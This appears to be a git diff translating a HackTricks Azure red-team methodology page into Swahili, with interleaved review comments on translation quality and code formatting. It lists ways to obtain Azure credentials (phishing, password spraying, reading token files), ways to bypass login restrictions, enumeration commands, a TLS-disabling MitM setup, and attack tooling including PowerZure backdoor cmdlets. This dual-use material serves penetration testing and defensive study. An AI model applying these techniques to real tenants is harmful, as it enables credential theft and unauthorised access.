mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-12 04:55:32 -08:00
Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/
@@ -10,46 +10,46 @@ az-basic-information/
|
||||
|
||||
## Azure Pentester/Red Team Methodology
|
||||
|
||||
In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected.
|
||||
Ili kukagua mazingira ya AZURE ni muhimu sana kujua: ni **huduma zipi zinatumika**, nini kinachoweza **kuonyeshwa**, nani ana **ufikiaji** wa nini, na jinsi huduma za ndani za Azure na **huduma za nje** zinavyounganishwa.
|
||||
|
||||
From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that:
|
||||
Kutoka kwa mtazamo wa Red Team, **hatua ya kwanza ya kuathiri mazingira ya Azure** ni kupata **akikazi** za Azure AD. Hapa kuna mawazo kadhaa juu ya jinsi ya kufanya hivyo:
|
||||
|
||||
- **Leaks** in github (or similar) - OSINT
|
||||
- **Social** Engineering
|
||||
- **Password** reuse (password leaks)
|
||||
- Vulnerabilities in Azure-Hosted Applications
|
||||
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
|
||||
- **Local File Read**
|
||||
- `/home/USERNAME/.azure`
|
||||
- `C:\Users\USERNAME\.azure`
|
||||
- The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
|
||||
- The file **`azureProfile.json`** contains **info** about logged user.
|
||||
- **`az logout`** removes the token.
|
||||
- Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
|
||||
Use `Disconnect-AzAccount` to remove them.
|
||||
- 3rd parties **breached**
|
||||
- **Internal** Employee
|
||||
- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
|
||||
- [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
|
||||
- **Mvujo** katika github (au sawa) - OSINT
|
||||
- **Uhandisi** wa Kijamii
|
||||
- **Tumia tena** nywila (mvujo wa nywila)
|
||||
- Uthibitisho katika Maombi ya Azure-Hosted
|
||||
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) yenye ufikiaji wa metadata endpoint
|
||||
- **Kusoma Faili za Mitaa**
|
||||
- `/home/USERNAME/.azure`
|
||||
- `C:\Users\USERNAME\.azure`
|
||||
- Faili **`accessTokens.json`** katika `az cli` kabla ya 2.30 - Jan2022 - ilihifadhi **tokens za ufikiaji kwa maandiko wazi**
|
||||
- Faili **`azureProfile.json`** ina **habari** kuhusu mtumiaji aliyeingia.
|
||||
- **`az logout`** inafuta token.
|
||||
- Matoleo ya zamani ya **`Az PowerShell`** yalihifadhi **tokens za ufikiaji** kwa **maandiko** wazi katika **`TokenCache.dat`**. Pia inahifadhi **ServicePrincipalSecret** kwa **maandiko** wazi katika **`AzureRmContext.json`**. Cmdlet **`Save-AzContext`** inaweza kutumika kuhifadhi **tokens**.\
|
||||
Tumia `Disconnect-AzAccount` kuondoa hizo.
|
||||
- Watu wa 3rd **walivunja**
|
||||
- **Mfanyakazi** wa Ndani
|
||||
- [**Phishing ya Kawaida**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (akikazi au Oauth App)
|
||||
- [Phishing ya Uthibitisho wa Kifaa](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
|
||||
- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
|
||||
|
||||
Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it:
|
||||
Hata kama huja **athiri mtumiaji yeyote** ndani ya tenant ya Azure unayoishambulia, unaweza **kusanya habari** kutoka kwake:
|
||||
|
||||
{{#ref}}
|
||||
az-unauthenticated-enum-and-initial-entry/
|
||||
{{#endref}}
|
||||
|
||||
> [!NOTE]
|
||||
> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
|
||||
> Baada ya kufanikiwa kupata akiba, unahitaji kujua **ni nani anayemiliki hizo akiba**, na **nini wana ufikiaji**, hivyo unahitaji kufanya uhesabu wa msingi:
|
||||
|
||||
## Basic Enumeration
|
||||
|
||||
> [!NOTE]
|
||||
> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
|
||||
> Kumbuka kwamba sehemu ya **sauti kubwa** ya uhesabu ni **kuingia**, si uhesabu yenyewe.
|
||||
|
||||
### SSRF
|
||||
|
||||
If you found a SSRF in a machine inside Azure check this page for tricks:
|
||||
Ikiwa umepata SSRF katika mashine ndani ya Azure angalia ukurasa huu kwa mbinu:
|
||||
|
||||
{{#ref}}
|
||||
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
|
||||
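Review bot: the added bullet 'Uthibitisho katika Maombi ya Azure-Hosted' mistranslates 'Vulnerabilities in Azure-Hosted Applications': 'uthibitisho' means verification or authentication, so the item now reads as "Authentication in Azure-hosted applications"; a word meaning weakness/vulnerability (such as 'udhaifu') is needed. In the same list, '3rd parties breached' becomes 'Watu wa 3rd walivunja' (third parties broke in), which inverts who was compromised. 'Credentials' is rendered 'akikazi' on the Red Team sentence and the Common Phishing bullet but 'akiba' in the NOTE block at the end of the hunk; settle on one term (keeping the English 'credentials' would be clearer than 'akiba', which normally means savings or a reserve). The 'Azure Password Spraying' bullet is the only list item left in English.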
@@ -59,14 +59,14 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
|
||||
|
||||
<figure><img src="../../images/image (268).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place:
|
||||
Katika hali ambapo una akiba halali lakini huwezi kuingia, hizi ni baadhi ya ulinzi wa kawaida ambao unaweza kuwepo:
|
||||
|
||||
- **IP whitelisting** -- You need to compromise a valid IP
|
||||
- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
|
||||
- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
|
||||
- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
|
||||
- **IP whitelisting** -- Unahitaji kuathiri IP halali
|
||||
- **Geo restrictions** -- Tafuta mahali mtumiaji anaishi au ofisi za kampuni na pata IP kutoka jiji moja (au nchi angalau)
|
||||
- **Browser** -- Labda ni kivinjari tu kutoka OS fulani (Windows, Linux, Mac, Android, iOS) kinachoruhusiwa. Jua ni OS ipi mwathirika/kampuni inatumia.
|
||||
- Unaweza pia kujaribu **kuathiri akiba za Service Principal** kwani kawaida huwa na mipaka kidogo na kuingia kwake hakuchunguzwi sana
|
||||
|
||||
After bypassing it, you might be able to get back to your initial setup and you will still have access.
|
||||
Baada ya kuipita, unaweza kuwa na uwezo wa kurudi kwenye mipangilio yako ya awali na bado utakuwa na ufikiaji.
|
||||
|
||||
### Subdomain Takeover
|
||||
|
||||
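Review bot: 'una akiba halali' for 'you have some valid credentials' (first added line of this hunk) and 'kuathiri akiba za Service Principal' both use 'akiba', which means savings or a reserve rather than login credentials; keep the English term 'credentials' or whichever single phrase the rest of this commit settles on. The remaining bullets read correctly, and 'au nchi angalau' also repairs the 'contry' typo of the source line.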
@@ -75,13 +75,12 @@ After bypassing it, you might be able to get back to your initial setup and you
|
||||
### Whoami
|
||||
|
||||
> [!CAUTION]
|
||||
> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
|
||||
> Jifunze **jinsi ya kufunga** az cli, AzureAD na Az PowerShell katika sehemu ya [**Az - Entra ID**](az-services/az-azuread.md).
|
||||
|
||||
One of the first things you need to know is **who you are** (in which environment you are):
|
||||
Moja ya mambo ya kwanza unahitaji kujua ni **wewe ni nani** (katika mazingira gani uko):
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="az cli" }}
|
||||
|
||||
```bash
|
||||
az account list
|
||||
az account tenant list # Current tenant info
|
||||
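Review bot: 'kufunga' for 'install' in the translated CAUTION line ('jinsi ya kufunga az cli, AzureAD na Az PowerShell') is ambiguous, since it commonly means to close or fasten; 'kusakinisha' is the usual term for installing software and would read unambiguously.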
@@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user
|
||||
az ad signed-in-user list-owned-objects # Get owned objects by current user
|
||||
az account management-group list #Not allowed by default
|
||||
```
|
||||
|
||||
{{#endtab }}
|
||||
|
||||
{{#tab name="AzureAD" }}
|
||||
|
||||
```powershell
|
||||
#Get the current session state
|
||||
Get-AzureADCurrentSessionInfo
|
||||
#Get details of the current tenant
|
||||
Get-AzureADTenantDetail
|
||||
```
|
||||
|
||||
{{#endtab }}
|
||||
|
||||
{{#tab name="Az PowerShell" }}
|
||||
|
||||
```powershell
|
||||
# Get the information about the current context (Account, Tenant, Subscription etc.)
|
||||
Get-AzContext
|
||||
@@ -121,53 +116,49 @@ Get-AzResource
|
||||
Get-AzRoleAssignment # For all users
|
||||
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user
|
||||
```
|
||||
|
||||
{{#endtab }}
|
||||
{{#endtabs }}
|
||||
|
||||
> [!CAUTION]
|
||||
> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
|
||||
> Moja ya amri muhimu zaidi za kuhesabu Azure ni **`Get-AzResource`** kutoka Az PowerShell kwani inakuwezesha **kujua rasilimali ambazo mtumiaji wako wa sasa anaweza kuona**.
|
||||
>
|
||||
> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
|
||||
> Unaweza kupata taarifa sawa katika **konsoli ya wavuti** ukitembelea [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) au kutafuta "All resources"
|
||||
|
||||
### ENtra ID Enumeration
|
||||
|
||||
By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\
|
||||
You can find here a guide:
|
||||
Kwa kawaida, mtumiaji yeyote anapaswa kuwa na **idhini ya kutosha kuhesabu** mambo kama vile, watumiaji, vikundi, majukumu, wahusika wa huduma... (angalia [idhini za AzureAD za kawaida](az-basic-information/#default-user-permissions)).\
|
||||
Unaweza kupata hapa mwongozo:
|
||||
|
||||
{{#ref}}
|
||||
az-services/az-azuread.md
|
||||
{{#endref}}
|
||||
|
||||
> [!NOTE]
|
||||
> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
|
||||
> In the following section you can check some ways to **enumerate some common services.**
|
||||
> Sasa kwamba una **taarifa fulani kuhusu akreditivu zako** (na ikiwa wewe ni timu nyekundu matumaini huja **gundulika**). Ni wakati wa kubaini ni huduma zipi zinatumika katika mazingira.\
|
||||
> Katika sehemu ifuatayo unaweza kuangalia njia kadhaa za **kuhesabu huduma za kawaida.**
|
||||
|
||||
## App Service SCM
|
||||
|
||||
Kudu console to log in to the App Service 'container'.
|
||||
Konsoli ya Kudu kuingia kwenye 'konteina' ya App Service.
|
||||
|
||||
## Webshell
|
||||
|
||||
Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account.
|
||||
Tumia portal.azure.com na uchague shell, au tumia shell.azure.com, kwa bash au powershell. 'disk' ya shell hii inahifadhiwa kama faili ya picha katika akaunti ya hifadhi.
|
||||
|
||||
## Azure DevOps
|
||||
|
||||
Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets.
|
||||
Azure DevOps ni tofauti na Azure. Ina hazina, mipangilio (yaml au toleo), bodi, wiki, na zaidi. Makundi ya Vigezo yanatumika kuhifadhi thamani za vigezo na siri.
|
||||
|
||||
## Debug | MitM az cli
|
||||
|
||||
Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
|
||||
|
||||
Kwa kutumia parameter **`--debug`** inawezekana kuona maombi yote ambayo chombo **`az`** kinatuma:
|
||||
```bash
|
||||
az account management-group list --output table --debug
|
||||
```
|
||||
|
||||
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
|
||||
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kufanya:
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="Bash" }}
|
||||
|
||||
```bash
|
||||
export ADAL_PYTHON_SSL_NO_VERIFY=1
|
||||
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
|
||||
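Review bot: the heading '### ENtra ID Enumeration' keeps its capitalisation typo because it is an unchanged context line; fix it to 'Entra ID Enumeration' while this block is being edited. 'Credentials' gets a third rendering here ('akreditivu' in the translated NOTE block) after 'akikazi' and 'akiba' in the earlier hunks. Headings are handled inconsistently: '## App Service SCM', '## Webshell', '## Azure DevOps' and '## Debug | MitM az cli' stay in English while the next hunk translates '## Automated Recon Tools'. Finally, the translated '--debug' sentence appears to land after the blank line and directly above the ```bash fence; keep a blank line between the prose and the fence as the English version had.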
@@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080"
|
||||
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
|
||||
export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
|
||||
```
|
||||
|
||||
{{#endtab }}
|
||||
|
||||
{{#tab name="PS" }}
|
||||
|
||||
```bash
|
||||
$env:ADAL_PYTHON_SSL_NO_VERIFY=1
|
||||
$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
|
||||
$env:HTTPS_PROXY="http://127.0.0.1:8080"
|
||||
$env:HTTP_PROXY="http://127.0.0.1:8080"
|
||||
```
|
||||
|
||||
{{#endtab }}
|
||||
{{#endtabs }}
|
||||
|
||||
## Automated Recon Tools
|
||||
## Zana za Upelelezi za Kiotomatiki
|
||||
|
||||
### [**ROADRecon**](https://github.com/dirkjanm/ROADtools)
|
||||
|
||||
```powershell
|
||||
cd ROADTools
|
||||
pipenv shell
|
||||
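Review bot: the `{{#tab name="PS" }}` block is fenced as ```bash although its lines are PowerShell (`$env:HTTPS_PROXY=...`); tag it ```powershell so highlighting and copy-paste behave. It is an unchanged context line, but it sits inside the region this commit touches. The Bash tab also mixes `~/Downloads/cacert.der` with an absolute `/Users/user/Downloads/cacert.pem` for the same file; use one form so the two lines agree.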
@@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!"
|
||||
roadrecon gather
|
||||
roadrecon gui
|
||||
```
|
||||
|
||||
### [Monkey365](https://github.com/silverhack/monkey365)
|
||||
|
||||
```powershell
|
||||
Import-Module monkey365
|
||||
Get-Help Invoke-Monkey365
|
||||
@@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed
|
||||
Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue
|
||||
Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML
|
||||
```
|
||||
|
||||
### [**Stormspotter**](https://github.com/Azure/Stormspotter)
|
||||
|
||||
```powershell
|
||||
# Start Backend
|
||||
cd stormspotter\backend\
|
||||
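Review bot: `Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML` has a space between `-` and `Instance`, so PowerShell will not parse `-Instance` as the parameter name; it should read `Invoke-Monkey365 -Instance Azure -Analysis All -ExportTo HTML`. This is a context line, but it is worth correcting while the block is being touched.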
@@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022!
|
||||
python stormspotter\stormcollector\sscollector.pyz cli
|
||||
# This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
|
||||
```
|
||||
|
||||
### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound)
|
||||
|
||||
```powershell
|
||||
# You need to use the Az PowerShell and Azure AD modules:
|
||||
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
|
||||
@@ -294,9 +275,7 @@ MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu
|
||||
## All Azure AD Groups that are synchronized with On-Premise AD
|
||||
MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n
|
||||
```
|
||||
|
||||
### [Azucar](https://github.com/nccgroup/azucar)
|
||||
|
||||
```bash
|
||||
# You should use an account with at least read-permission on the assets you want to access
|
||||
git clone https://github.com/nccgroup/azucar.git
|
||||
@@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials
|
||||
# resolve the TenantID for an specific username
|
||||
PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
|
||||
```
|
||||
|
||||
### [**MicroBurst**](https://github.com/NetSPI/MicroBurst)
|
||||
|
||||
```
|
||||
Import-Module .\MicroBurst.psm1
|
||||
Import-Module .\Get-AzureDomainInfo.ps1
|
||||
Get-AzureDomainInfo -folder MicroBurst -Verbose
|
||||
```
|
||||
|
||||
### [**PowerZure**](https://github.com/hausec/PowerZure)
|
||||
|
||||
```powershell
|
||||
Connect-AzAccount
|
||||
ipmo C:\Path\To\Powerzure.psd1
|
||||
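Review bot: the Azucar block is fenced ```bash yet its commands are PowerShell with a `PS>` prompt (`PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com`), and the MicroBurst block opens with a bare ``` fence carrying no language; tag both ```powershell and drop the `PS>` prefixes so the lines can be pasted as-is. Also, 'resolve the TenantID for an specific username' should read 'a specific username'.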
@@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
|
||||
# Administrator
|
||||
$ Create-Backdoor, Execute-Backdoor
|
||||
```
|
||||
|
||||
### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner)
|
||||
|
||||
```powershell
|
||||
|
||||
#Get-GraphTokens
|
||||
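Review bot: the PowerZure block prefixes commands with a `$ ` shell prompt (`$ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest`, `$ Create-Backdoor, Execute-Backdoor`) inside a ```powershell fence; remove the prompt so the lines are valid PowerShell. `Create-Backdoor, Execute-Backdoor` is also a comma-separated list of two cmdlet names rather than a runnable command; if they are meant to be run separately, put each on its own line.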
@@ -398,9 +371,4 @@ Get-TenantID -Domain
|
||||
#Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
|
||||
Invoke-GraphRunner -Tokens $tokens
|
||||
```
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,374 +1,370 @@
|
||||
# Az - Basic Information
|
||||
# Az - Taarifa za Msingi
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Organization Hierarchy
|
||||
## Muundo wa Shirika
|
||||
|
||||
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUcVrh1BpuQXN7RzGqoxrn-4Nm_sjdJU-dDTvshloB7UMQnN1mtH9N94zNiPCzOYAqE9EsJqlboZOj47tQsQktjxszpKvIDPZLs9rgyiObcZCvl7N0ZWztshR0ZddyBYZIAwPIkrEQ=s2048?key=l3Eei079oPmVJuh8lxQYxxrB" alt=""><figcaption><p><a href="https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png">https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png</a></p></figcaption></figure>
|
||||
|
||||
### Management Groups
|
||||
### Vikundi vya Usimamizi
|
||||
|
||||
- It can contain **other management groups or subscriptions**.
|
||||
- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group.
|
||||
- **10,000 management** groups can be supported in a single directory.
|
||||
- A management group tree can support **up to six levels of depth**. This limit doesn’t include the root level or the subscription level.
|
||||
- Each management group and subscription can support **only one parent**.
|
||||
- Even if several management groups can be created **there is only 1 root management group**.
|
||||
- The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**.
|
||||
- All subscriptions within a single management group must trust the **same Entra ID tenant.**
|
||||
- Inaweza kuwa na **vikundi vingine vya usimamizi au usajili**.
|
||||
- Hii inaruhusu **kutekeleza udhibiti wa utawala** kama vile RBAC na Sera za Azure mara moja kwenye kiwango cha kundi la usimamizi na kuwa **na urithi** na usajili wote ndani ya kundi.
|
||||
- **Vikundi 10,000 vya usimamizi** vinaweza kuungwa mkono katika directory moja.
|
||||
- Mti wa kundi la usimamizi unaweza kuunga mkono **hadi viwango sita vya kina**. Kiwango hiki hakijumuishi kiwango cha mzizi au kiwango cha usajili.
|
||||
- Kila kundi la usimamizi na usajili linaweza kuunga mkono **mzazi mmoja tu**.
|
||||
- Hata kama vikundi vingi vya usimamizi vinaweza kuundwa **kuna kundi moja la usimamizi la mzizi tu**.
|
||||
- Kundi la usimamizi la mzizi **linashikilia** **vikundi vingine vya usimamizi na usajili** na **halitaweza kuhamishwa au kufutwa**.
|
||||
- Usajili wote ndani ya kundi moja la usimamizi lazima uamini **tenant ya Entra ID sawa**.
|
||||
|
||||
<figure><img src="../../../images/image (147).png" alt=""><figcaption><p><a href="https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png">https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png</a></p></figcaption></figure>
|
||||
|
||||
### Azure Subscriptions
|
||||
### Usajili wa Azure
|
||||
|
||||
- It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed.
|
||||
- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
|
||||
- It **trust only one Entra ID** directory
|
||||
- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
|
||||
- Ni **konteina nyingine ya kimantiki ambapo rasilimali** (VMs, DBs…) zinaweza kuendeshwa na zitalipiwa.
|
||||
- **Mzazi** wake daima ni **kundi la usimamizi** (na inaweza kuwa kundi la usimamizi la mzizi) kwani usajili hauwezi kuwa na usajili mwingine.
|
||||
- Ina **aminika tu na directory moja ya Entra ID**
|
||||
- **Ruhusa** zilizotumika kwenye kiwango cha usajili (au yoyote ya wazazi wake) zina **urithi** kwa rasilimali zote ndani ya usajili
|
||||
|
||||
### Resource Groups
|
||||
### Vikundi vya Rasilimali
|
||||
|
||||
[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group.
|
||||
[Kutoka kwenye hati:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) Kundi la rasilimali ni **konteina** inayoshikilia **rasilimali zinazohusiana** kwa suluhisho la Azure. Kundi la rasilimali linaweza kujumuisha rasilimali zote za suluhisho, au zile tu **rasilimali ambazo unataka kusimamia kama kundi**. Kwa ujumla, ongeza **rasilimali** zinazoshiriki **mzunguko sawa** kwenye kundi moja la rasilimali ili uweze kupeleka, kusasisha, na kufuta kwa urahisi kama kundi.
|
||||
|
||||
All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
|
||||
Rasilimali zote lazima ziwe **ndani ya kundi la rasilimali** na zinaweza kumilikiwa tu na kundi moja na ikiwa kundi la rasilimali litafutwa, rasilimali zote ndani yake pia zitafutwa.
|
||||
|
||||
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1</a></p></figcaption></figure>
|
||||
|
||||
### Azure Resource IDs
|
||||
### Vitambulisho vya Rasilimali za Azure
|
||||
|
||||
Every resource in Azure has an Azure Resource ID that identifies it.
|
||||
Kila rasilimali katika Azure ina Vitambulisho vya Rasilimali za Azure vinavyoiainisha.
|
||||
|
||||
The format of an Azure Resource ID is as follows:
|
||||
Muundo wa Vitambulisho vya Rasilimali za Azure ni kama ifuatavyo:
|
||||
|
||||
- `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
|
||||
|
||||
For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this:
|
||||
Kwa mashine ya virtual inayoitwa myVM katika kundi la rasilimali `myResourceGroup` chini ya kitambulisho cha usajili `12345678-1234-1234-1234-123456789012`, Vitambulisho vya Rasilimali za Azure vinaonekana kama ifuatavyo:
|
||||
|
||||
- `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
|
||||
|
||||
## Azure vs Entra ID vs Azure AD Domain Services
|
||||
## Azure vs Entra ID vs Huduma za Kikoa za Azure AD
|
||||
|
||||
### Azure
|
||||
|
||||
Azure is Microsoft’s comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises.
|
||||
Azure ni jukwaa la **kumbukumbu la kompyuta la Microsoft, linalotoa huduma mbalimbali**, ikiwa ni pamoja na mashine za virtual, hifadhidata, akili bandia, na uhifadhi. Inafanya kazi kama msingi wa kuendesha na kusimamia programu, kujenga miundombinu inayoweza kupanuka, na kuendesha kazi za kisasa katika wingu. Azure inatoa zana kwa wabunifu na wataalamu wa IT kuunda, kupeleka, na kusimamia programu na huduma kwa urahisi, ikihudumia mahitaji mbalimbali kutoka kwa makampuni ya kuanzishwa hadi makampuni makubwa.
|
||||
|
||||
### Entra ID (formerly Azure Active Directory)
|
||||
### Entra ID (zamani Azure Active Directory)
|
||||
|
||||
Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others.
|
||||
Entra ID ni huduma ya **usimamizi wa utambulisho na ufikiaji** inayotegemea wingu iliyoundwa kushughulikia uthibitishaji, idhini, na udhibiti wa ufikiaji wa mtumiaji. Inatoa ufikiaji salama kwa huduma za Microsoft kama vile Office 365, Azure, na programu nyingi za SaaS za wahusika wengine. Ikiwa na vipengele kama vile kuingia mara moja (SSO), uthibitishaji wa hatua nyingi (MFA), na sera za ufikiaji wa masharti miongoni mwa zingine.
|
||||
|
||||
### Entra Domain Services (formerly Azure AD DS)
|
||||
### Huduma za Kikoa za Entra (zamani Azure AD DS)
|
||||
|
||||
Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments.
|
||||
Huduma za Kikoa za Entra zinaongeza uwezo wa Entra ID kwa kutoa **huduma za kikoa zinazoweza kusimamiwa zinazofaa na mazingira ya jadi ya Windows Active Directory**. Inasaidia protokali za zamani kama vile LDAP, Kerberos, na NTLM, ikiruhusu mashirika kuhamasisha au kuendesha programu za zamani katika wingu bila kupeleka wakala wa kikoa wa ndani. Huduma hii pia inasaidia Sera za Kundi kwa usimamizi wa kati, na kuifanya iweze kutumika katika hali ambapo kazi za zamani au zinazotegemea AD zinahitaji kuwepo pamoja na mazingira ya kisasa ya wingu.
|
||||
|
||||
## Entra ID Principals
|
||||
## Misingi ya Entra ID
|
||||
|
||||
### Users
|
||||
### Watumiaji
|
||||
|
||||
- **New users**
|
||||
- Indicate email name and domain from selected tenant
|
||||
- Indicate Display name
|
||||
- Indicate password
|
||||
- Indicate properties (first name, job title, contact info…)
|
||||
- Default user type is “**member**”
|
||||
- **External users**
|
||||
- Indicate email to invite and display name (can be a non Microsft email)
|
||||
- Indicate properties
|
||||
- Default user type is “**Guest**”
|
||||
- **Watumiaji wapya**
|
||||
